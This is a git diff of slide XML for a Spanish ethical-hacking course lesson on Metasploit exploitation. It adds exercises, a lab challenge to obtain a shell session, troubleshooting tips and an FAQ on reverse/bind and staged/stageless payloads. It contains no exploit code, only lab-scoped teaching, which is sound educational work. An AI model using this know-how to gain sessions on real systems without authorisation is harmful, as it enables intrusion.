--- a/classes/parte-3-hacking-etico-y-pentesting-metodologia/073-metasploit-explotacion-y-payloads/clase-073-presentacion.pptx
+++ b/classes/parte-3-hacking-etico-y-pentesting-metodologia/073-metasploit-explotacion-y-payloads/clase-073-presentacion.pptx
@@ -17,6 +17,9 @@
     <p:sldId id="265" r:id="rId16"/>
     <p:sldId id="266" r:id="rId17"/>
     <p:sldId id="267" r:id="rId18"/>
+    <p:sldId id="268" r:id="rId19"/>
+    <p:sldId id="269" r:id="rId20"/>
+    <p:sldId id="270" r:id="rId21"/>
   </p:sldIdLst>
   <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -3198,7 +3201,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>⚠️ Errores comunes</a:t>
+              <a:t>✍️ Ejercicios</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3236,97 +3239,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  "Exploit completed, but no session was created" — Payload o target incorrecto, o firewall bloqueando la conexión de vuelta; probar otro payload o ajustar set target</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  El handler no recibe nunca la conexión — LHOST apunta a 127.0.0.1 en vez de la IP real de la interfaz de laboratorio; corregir con ip a</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  "The target is not exploitable" tras check — La versión del servicio no es vulnerable; verificar con services y elegir otro módulo</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  La sesión se cae inmediatamente tras conectar — Payload staged inestable en la red de laboratorio; probar la variante stageless</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Puerto LPORT ya en uso — Otro handler o proceso ocupa el puerto; cambiar LPORT o finalizar el job anterior con jobs -K</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  El exploit tarda mucho o se queda colgado — Timeout de red o objetivo caído; verificar conectividad con ping/nmap antes de reintentar</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  set target con índice fuera de rango — El módulo tiene menos targets de los esperados; revisar show targets antes de fijar el índice</a:t>
+              <a:t>•  Explica con un ejemplo concreto en qué escenario un reverse shell es imprescindible frente a un bind shell.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Cambia un payload staged por su equivalente stageless en show payloads y describe la diferencia visible en el nombre y el tamaño.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Provoca un fallo de explotación poniendo un LHOST incorrecto y documenta el síntoma exacto observado en consola.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Usa check en un módulo que lo soporte y en uno que no lo soporte; documenta la diferencia de comportamiento.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Obtén dos sesiones simultáneas contra el mismo objetivo (usando dos exploits distintos) y practica moverte entre ellas con sessions -i.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Explica por qué el handler debe coincidir exactamente con el payload usado en el exploit, incluyendo arquitectura y formato.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Investiga y documenta, desde la perspectiva defensiva, qué patrón de tráfico de red generaría un IDS/IPS al detectar una conexión reverse shell hacia un puerto no estándar como el 4444.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3377,7 +3380,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>❓ Preguntas frecuentes</a:t>
+              <a:t>📝 Reto verificable</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3415,97 +3418,22 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  ❓ ¿Por qué aparece "Exploit completed, but no session was created" tan seguido?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Suele deberse a incompatibilidad de payload/target, un firewall bloqueando la conexión de vuelta, o un LHOST mal configurado. Revisar options, probar un payload distinto y confirmar la IP de escucha resuelve la mayoría de los casos.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  ❓ ¿Debo elegir staged o stageless por defecto?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Depende de la calidad de la red. En redes de laboratorio estables, staged reduce el tamaño inicial transmitido. En redes con pérdida de paquetes o proxies intermedios, stageless suele ser más fiable porque no depende de descargar etapas adicionales.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  ❓ ¿Debo usar siempre reverse shells en vez de bind shells?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  En la mayoría de escenarios reales sí, porque los firewalls corporativos permiten tráfico saliente pero bloquean el entrante no solicitado. Los bind shells solo son viables cuando puedes alcanzar directamente el puerto que abre la víctima, algo cada vez menos común.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  ❓ ¿El comando check es siempre seguro de ejecutar?</a:t>
+              <a:t>•  Reto: Obtener una sesión interactiva en la VM de laboratorio mediante un exploit real de Metasploit y demostrar ejecución de comandos en el sistema comprometido.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Criterio de aceptación: sessions -l muestra al menos una sesión activa contra el objetivo de laboratorio; se ejecuta id (o equivalente) mostrando el usuario obtenido en la víctima; y se documenta por…</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3556,7 +3484,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>🔗 Referencias</a:t>
+              <a:t>⚠️ Errores comunes</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3594,6 +3522,364 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
+              <a:t>•  "Exploit completed, but no session was created" — Payload o target incorrecto, o firewall bloqueando la conexión de vuelta; probar otro payload o ajustar set target</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  El handler no recibe nunca la conexión — LHOST apunta a 127.0.0.1 en vez de la IP real de la interfaz de laboratorio; corregir con ip a</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  "The target is not exploitable" tras check — La versión del servicio no es vulnerable; verificar con services y elegir otro módulo</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  La sesión se cae inmediatamente tras conectar — Payload staged inestable en la red de laboratorio; probar la variante stageless</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Puerto LPORT ya en uso — Otro handler o proceso ocupa el puerto; cambiar LPORT o finalizar el job anterior con jobs -K</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  El exploit tarda mucho o se queda colgado — Timeout de red o objetivo caído; verificar conectividad con ping/nmap antes de reintentar</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  set target con índice fuera de rango — El módulo tiene menos targets de los esperados; revisar show targets antes de fijar el índice</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide13.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr/>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="TextBox 1"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="320040"/>
+            <a:ext cx="8229600" cy="822960"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr sz="2600" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="0B3D2E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>❓ Preguntas frecuentes</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="TextBox 2"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="1280160"/>
+            <a:ext cx="8229600" cy="4937760"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  ❓ ¿Por qué aparece "Exploit completed, but no session was created" tan seguido?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Suele deberse a incompatibilidad de payload/target, un firewall bloqueando la conexión de vuelta, o un LHOST mal configurado. Revisar options, probar un payload distinto y confirmar la IP de escucha…</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  ❓ ¿Debo elegir staged o stageless por defecto?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Depende de la calidad de la red. En redes de laboratorio estables, staged reduce el tamaño inicial transmitido. En redes con pérdida de paquetes o proxies intermedios, stageless suele ser más fiable…</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  ❓ ¿Debo usar siempre reverse shells en vez de bind shells?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  En la mayoría de escenarios reales sí, porque los firewalls corporativos permiten tráfico saliente pero bloquean el entrante no solicitado. Los bind shells solo son viables cuando puedes alcanzar…</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  ❓ ¿El comando check es siempre seguro de ejecutar?</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide14.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr/>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="TextBox 1"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="320040"/>
+            <a:ext cx="8229600" cy="822960"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr sz="2600" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="0B3D2E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>🔗 Referencias</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="TextBox 2"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="1280160"/>
+            <a:ext cx="8229600" cy="4937760"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
               <a:t>•  Kennedy, D. et al. "Metasploit: The Penetration Tester's Guide" (No Starch Press) — capítulos sobre explotación y payloads.</a:t>
             </a:r>
           </a:p>
@@ -3674,6 +3960,81 @@
           </a:p>
         </p:txBody>
       </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide15.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr/>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="TextBox 1"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="274320"/>
+            <a:ext cx="8229600" cy="640080"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr sz="2200" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="0B3D2E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Diagrama de la clase</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="3" name="Picture 2" descr="09a221757ad8d58e.png"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3283894" y="1097280"/>
+            <a:ext cx="2576211" cy="5303520"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
   </p:cSld>
   <p:clrMapOvr>
@@ -3758,7 +4119,7 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  El alumno ejecutará el ciclo completo de explotación con Metasploit sobre un laboratorio propio: seleccionar un exploit acorde a una vulnerabilidad enumerada, elegir y configurar el payload adecuado (bind vs. reverse, staged vs. stageless), lanzar el ataque y gestionar la sesión resultante. Esta es la clase donde el reconocimiento se convierte en acceso real a un sistema, y por eso exige el máximo rigor ético y técnico.</a:t>
+              <a:t>•  El alumno ejecutará el ciclo completo de explotación con Metasploit sobre un laboratorio propio: seleccionar un exploit acorde a una vulnerabilidad enumerada, elegir y configurar el payload adecuado…</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4167,7 +4528,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>📖 Definiciones y características</a:t>
+              <a:t>🧠 Explicación en profundidad</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4205,82 +4566,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Reverse shell: conexión donde la máquina víctima se conecta hacia el atacante. Característica clave: atraviesa firewalls que permiten tráfico saliente pero bloquean el entrante, el escenario más común en redes reales.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Bind shell: conexión donde el atacante se conecta a un puerto abierto por la víctima. Característica clave: falla si existe un firewall de entrada entre atacante y víctima.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Payload staged: payload identificado con / en su nombre (ej. windows/meterpreter/reversetcp) que envía primero un stager pequeño y luego descarga el resto. Característica clave: menor tamaño inicial, pero depende de más pasos de red.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Payload stageless: payload identificado con  (ej. windows/meterpreterreversetcp) que se envía completo en un solo bloque. Característica clave: más fiable en redes inestables o con filtrado agresivo, a costa de mayor tamaño.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Handler (exploit/multi/handler): módulo genérico que escucha la conexión que hará el payload una vez ejecutado en la víctima. Característica clave: debe configurarse con el mismo tipo de payload exacto que se generó o se usó en el exploit.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  check: comando de Metasploit que verifica si el objetivo es vulnerable sin lanzar la explotación completa. Característica clave: no todos los módulos lo implementan, pero cuando existe reduce el riesgo de afectar el servicio.</a:t>
+              <a:t>•  La explotación empieza por una decisión que parece obvia y que se falla constantemente:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  el exploit tiene que coincidir con la vulnerabilidad exacta del objetivo, no solo con el</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  servicio. La versión, la arquitectura (x86/x64), el idioma del sistema y hasta el nivel de</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  parche cambian los offsets de memoria de los que depende un exploit; lanzar uno que no</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  corresponde no solo falla, sino que puede tumbar el servicio —un intento de</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
